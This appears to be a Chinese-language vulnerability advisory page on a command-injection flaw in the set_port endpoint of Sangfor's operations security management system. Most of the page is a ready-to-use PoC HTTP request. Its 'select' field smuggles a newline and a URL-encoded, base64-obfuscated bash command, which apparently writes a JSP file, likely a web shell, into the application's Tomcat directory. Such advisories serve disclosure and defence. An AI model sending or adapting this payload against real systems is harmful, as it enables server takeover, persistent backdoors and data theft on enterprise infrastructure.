深信服运维安全管理系统 /fort/system;login/netConfig/set_port 命令执行漏洞

日期: 2025-07-03 | 影响软件: 深信服 | POC: 已公开

漏洞描述

深信服运维安全管理系统是一款用于企业网络安全管理的综合性解决方案,提供多种安全功能以保障企业网络的安全性。系统的 netConfig/set_port 接口存在命令执行漏洞,攻击者可以通过该漏洞执行任意系统命令,从而控制服务器或窃取敏感信息。

PoC代码

POST /fort/system;login/netConfig/set_port HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded

select=6379+-j+DROP%0a%62%61%73%68%20%2d%63%20%24%28%65%63%68%6f%20%5a%57%4e%6f%62%79%41%69%55%45%4e%56%5a%32%46%74%52%6a%4a%5a%55%7a%56%77%59%6e%6b%31%53%6d%4a%75%51%6a%46%6b%52%6b%34%77%59%32%31%57%61%47%4a%54%51%6e%42%69%61%55%45%35%53%55%5a%4b%4d%57%4a%75%55%6e%42%69%56%31%56%31%57%6a%4a%57%4d%46%56%75%56%6e%56%6b%52%32%78%30%57%6c%4e%6e%63%45%78%74%56%6a%52%61%56%30%31%76%59%32%31%57%65%47%52%58%56%6e%70%6b%51%7a%56%75%57%6c%68%53%55%56%6c%59%53%6d%68%69%56%31%59%77%57%6c%68%4a%62%30%6c%74%54%6e%52%61%51%30%6c%77%53%31%4d%31%62%6c%70%59%55%6b%70%69%62%6b%49%78%5a%45%5a%4f%4d%47%4e%74%56%6d%68%69%55%32%64%77%54%7a%4a%73%64%57%52%44%51%6d%68%4a%52%44%42%6e%54%46%52%46%4e%31%6c%75%62%44%42%61%56%6e%52%6b%53%55%64%4a%5a%31%42%54%51%6e%56%61%57%47%4e%6e%57%57%35%73%4d%46%70%57%63%33%6c%4e%52%46%45%30%57%46%52%30%64%6d%52%59%55%58%56%6a%53%45%70%77%59%6d%35%52%62%30%6c%71%65%48%64%6a%62%56%55%72%53%57%6c%72%4e%32%51%79%61%48%42%69%52%31%56%76%53%30%64%46%4f%57%46%58%4e%48%56%6a%62%56%5a%6f%57%6b%4e%6f%61%55%74%54%61%32%68%51%55%7a%42%34%53%31%68%30%64%6d%52%59%55%58%56%6a%53%45%70%77%59%6d%35%53%63%32%4a%70%61%48%56%61%57%47%4e%6e%56%54%4e%53%65%57%46%58%4e%57%35%4c%52%30%6c%7a%54%55%4e%34%61%45%74%54%61%7a%64%6d%56%7a%6b%78%5a%45%4d%31%64%32%4e%74%62%48%56%6b%51%32%64%70%55%45%4d%35%64%32%4e%74%56%53%74%4a%61%57%73%33%59%6d%31%57%4d%30%6c%48%63%47%68%6b%62%55%56%31%59%56%63%34%64%56%4a%74%62%48%4e%61%55%32%68%6f%59%30%68%43%63%32%46%58%54%6d%68%6b%52%32%78%32%59%6d%6b%31%62%6c%70%59%55%6c%4e%61%56%30%5a%7a%56%55%64%47%4d%47%46%44%61%48%6c%61%57%45%59%78%57%6c%68%4f%4d%45%78%74%5a%47%78%6b%52%6b%35%73%59%32%35%61%63%31%70%59%55%6c%46%5a%57%46%4a%76%53%30%4e%72%63%45%74%54%4e%57%74%61%56%33%68%73%5a%45%64%56%62%30%74%55%63%32%78%51%5a%7a%30%39%49%69%42%38%59%6d%46%7a%5a%54%59%30%49%43%31%6b%49%44%34%67%4c%33%56%7a%63%69%39%73%62%32%4e%68%62%43%39%30%62%32%31%6a%59%58%51%76%64%32%56%69%59%58%42%77%63%79%39%6d%62%33%4a%30%4c%33%52%79%64%58%4e%30%4c%33%5a%6c%63%6e%4e%70%62%32%34%76%62%47%39%6e%4c%6d%70%7a%63%41%3d%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%20%2d%69%29%0d%0a%65%78%69%74%3b%0d%0aecho&Unselect=22,443,9443

相关漏洞推荐